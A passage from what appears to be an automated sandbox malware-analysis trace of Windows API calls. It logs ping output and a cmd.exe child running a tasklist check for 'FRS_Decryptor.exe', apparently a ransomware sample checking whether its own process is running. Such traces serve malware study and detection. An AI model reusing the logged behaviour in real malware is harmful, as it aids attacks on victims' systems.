lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0114.420] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x10b8070 [0114.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x10b8070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0114.420] _fileno (_File=0x76ea4c28) returned 1 [0114.420] _write (in: _FileHandle=1, _Buf=0x10b8070*, _MaxCharCount=0x61 | out: _Buf=0x10b8070*) returned 97 [0114.420] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0114.420] _fileno (_File=0x76ea4c28) returned 1 [0114.420] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0114.420] LocalFree (hMem=0x10b8070) returned 0x0 [0114.420] LocalFree (hMem=0x10b7fa0) returned 0x0 [0114.420] IcmpCloseHandle (IcmpHandle=0x10a6c98) returned 1 [0114.421] LocalFree (hMem=0x10ac188) returned 0x0 [0114.421] LocalFree (hMem=0x10b5270) returned 0x0 [0114.421] WSACleanup () returned 0 [0114.421] exit (_Code=0) Thread: id = 315 os_tid = 0xadc Thread: id = 316 os_tid = 0xaec Process: id = "114" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x61be7000" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5892 start_va = 0xc30000 end_va = 0xc4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 5893 start_va = 0xc50000 end_va = 0xc51fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 5894 start_va = 0xc60000 end_va = 0xc6efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 5895 start_va = 0xc70000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 5896 start_va = 0xcb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 5897 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 5898 start_va = 0xdc0000 end_va = 0xdc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 5899 start_va = 0xdd0000 end_va = 0xdd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 5900 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5901 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5902 start_va = 0x7ef50000 end_va = 0x7ef72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef50000" filename = "" Region: id = 5903 start_va = 0x7ef79000 end_va = 0x7ef7bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef79000" filename = "" Region: id = 5904 start_va = 0x7ef7c000 end_va = 0x7ef7cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef7c000" filename = "" Region: id = 5905 start_va = 0x7ef7e000 end_va = 0x7ef7efff entry_point = 0x0 region_type = private name = "private_0x000000007ef7e000" filename = "" Region: id = 5906 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5907 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5908 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5909 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5910 start_va = 0xf60000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 5911 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5912 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5913 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5914 start_va = 0xc30000 end_va = 0xc3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 5915 start_va = 0xde0000 end_va = 0xe5dfff entry_point = 0xde0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5916 start_va = 0xe60000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 5917 start_va = 0x1100000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 5918 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5919 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5920 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5921 start_va = 0x7ee50000 end_va = 0x7ef4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee50000" filename = "" Region: id = 5922 start_va = 0xc40000 end_va = 0xc43fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 5923 start_va = 0x12e0000 end_va = 0x15b4fff entry_point = 0x12e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5942 start_va = 0xc50000 end_va = 0xc53fff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Thread: id = 317 os_tid = 0xb50 [0114.446] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0114.446] __set_app_type (_Type=0x1) [0114.446] __p__fmode () returned 0x76ea1768 [0114.446] __p__commode () returned 0x76ea176c [0114.446] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0114.446] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0114.446] GetCurrentThreadId () returned 0xb50 [0114.446] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb50) returned 0x34 [0114.446] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0114.446] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0114.446] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.448] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.448] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xdafd50 | out: phkResult=0xdafd50*=0x0) returned 0x2 [0114.448] VirtualQuery (in: lpAddress=0xdafd5f, lpBuffer=0xdafcf8, dwLength=0x1c | out: lpBuffer=0xdafcf8*(BaseAddress=0xdaf000, AllocationBase=0xcb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.448] VirtualQuery (in: lpAddress=0xcb0000, lpBuffer=0xdafcf8, dwLength=0x1c | out: lpBuffer=0xdafcf8*(BaseAddress=0xcb0000, AllocationBase=0xcb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0114.448] VirtualQuery (in: lpAddress=0xcb1000, lpBuffer=0xdafcf8, dwLength=0x1c | out: lpBuffer=0xdafcf8*(BaseAddress=0xcb1000, AllocationBase=0xcb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0114.448] VirtualQuery (in: lpAddress=0xcb3000, lpBuffer=0xdafcf8, dwLength=0x1c | out: lpBuffer=0xdafcf8*(BaseAddress=0xcb3000, AllocationBase=0xcb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0114.448] VirtualQuery (in: lpAddress=0xdb0000, lpBuffer=0xdafcf8, dwLength=0x1c | out: lpBuffer=0xdafcf8*(BaseAddress=0xdb0000, AllocationBase=0xdb0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0114.448] GetConsoleOutputCP () returned 0x1b5 [0114.448] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0114.449] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0114.449] _get_osfhandle (_FileHandle=1) returned 0x260 [0114.449] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0114.449] _get_osfhandle (_FileHandle=1) returned 0x260 [0114.449] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0114.449] _get_osfhandle (_FileHandle=0) returned 0x24 [0114.449] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0114.449] GetEnvironmentStringsW () returned 0xe640c0* [0114.449] FreeEnvironmentStringsA (penv="=") returned 1 [0114.449] GetEnvironmentStringsW () returned 0xe640c0* [0114.449] FreeEnvironmentStringsA (penv="=") returned 1 [0114.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xdaeca0 | out: phkResult=0xdaeca0*=0x44) returned 0x0 [0114.449] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x0, lpData=0xdaecac*=0x0, lpcbData=0xdaeca4*=0x1000) returned 0x2 [0114.449] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x1, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.449] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x0, lpData=0xdaecac*=0x1, lpcbData=0xdaeca4*=0x1000) returned 0x2 [0114.449] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x0, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.449] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x40, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.449] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x40, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.449] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x0, lpData=0xdaecac*=0x40, lpcbData=0xdaeca4*=0x1000) returned 0x2 [0114.449] RegCloseKey (hKey=0x44) returned 0x0 [0114.450] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xdaeca0 | out: phkResult=0xdaeca0*=0x44) returned 0x0 [0114.450] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x0, lpData=0xdaecac*=0x40, lpcbData=0xdaeca4*=0x1000) returned 0x2 [0114.450] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x1, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.450] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x0, lpData=0xdaecac*=0x1, lpcbData=0xdaeca4*=0x1000) returned 0x2 [0114.450] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x0, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.450] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x9, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.450] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x4, lpData=0xdaecac*=0x9, lpcbData=0xdaeca4*=0x4) returned 0x0 [0114.450] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xdaeca8, lpData=0xdaecac, lpcbData=0xdaeca4*=0x1000 | out: lpType=0xdaeca8*=0x0, lpData=0xdaecac*=0x9, lpcbData=0xdaeca4*=0x1000) returned 0x2 [0114.450] RegCloseKey (hKey=0x44) returned 0x0 [0114.450] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5009d [0114.450] srand (_Seed=0x5aa5009d) [0114.450] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0114.450] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0114.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0114.450] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe640c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0114.450] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.450] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.450] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0114.450] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.450] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.450] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.450] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.450] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.450] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.450] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.450] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.450] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.450] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.450] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xdafa80 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0114.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xdafa80, lpFilePart=0xdafa7c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xdafa7c*="Desktop") returned 0x1c [0114.451] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0114.451] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xdaf7f8 | out: lpFindFileData=0xdaf7f8) returned 0xe642d8 [0114.451] FindClose (in: hFindFile=0xe642d8 | out: hFindFile=0xe642d8) returned 1 [0114.451] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xdaf7f8 | out: lpFindFileData=0xdaf7f8) returned 0xe642d8 [0114.451] FindClose (in: hFindFile=0xe642d8 | out: hFindFile=0xe642d8) returned 1 [0114.451] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0114.451] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xdaf7f8 | out: lpFindFileData=0xdaf7f8) returned 0xe642d8 [0114.451] FindClose (in: hFindFile=0xe642d8 | out: hFindFile=0xe642d8) returned 1 [0114.451] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0114.451] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0114.451] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0114.451] GetEnvironmentStringsW () returned 0xe66190* [0114.451] FreeEnvironmentStringsA (penv="=") returned 1 [0114.451] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0114.452] GetConsoleOutputCP () returned 0x1b5 [0114.452] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0114.452] GetUserDefaultLCID () returned 0x409 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xdafbac, cchData=128 | out: lpLCData="0") returned 2 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xdafbac, cchData=128 | out: lpLCData="0") returned 2 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xdafbac, cchData=128 | out: lpLCData="1") returned 2 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0114.452] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0114.453] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.453] GetConsoleTitleW (in: lpConsoleTitle=0xe64e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0114.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0114.454] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0114.454] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0114.454] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0114.454] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0114.454] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0114.454] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0114.454] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0114.454] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0114.454] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0114.454] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0114.455] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0114.455] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0114.455] _wcsicmp (_String1="IF", _String2="find") returned 3 [0114.455] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0114.455] _wcsicmp (_String1="REM", _String2="find") returned 12 [0114.455] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0114.456] _pipe (in: _PtHandles=0xe651f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xe651f0) returned 0 [0114.456] _dup (_FileHandle=1) returned 5 [0114.456] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0114.456] _close (_FileHandle=4) returned 0 [0114.456] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0114.456] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0114.456] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0114.456] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0114.456] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0114.456] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0114.456] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0114.456] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0114.456] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0114.456] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0114.456] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0114.456] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0114.456] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0114.457] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0114.457] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0114.457] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0114.457] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0114.457] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0114.457] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0114.457] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0114.457] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0114.457] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0114.457] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0114.457] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0114.457] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0114.457] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0114.457] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0114.457] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0114.457] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0114.457] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0114.457] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0114.457] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0114.457] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0114.457] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0114.457] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0114.457] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0114.457] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0114.457] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0114.457] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0114.457] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0114.457] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0114.457] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0114.457] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0114.457] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0114.457] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0114.457] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0114.457] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0114.457] _wcsicmp (_String1="tasklist", 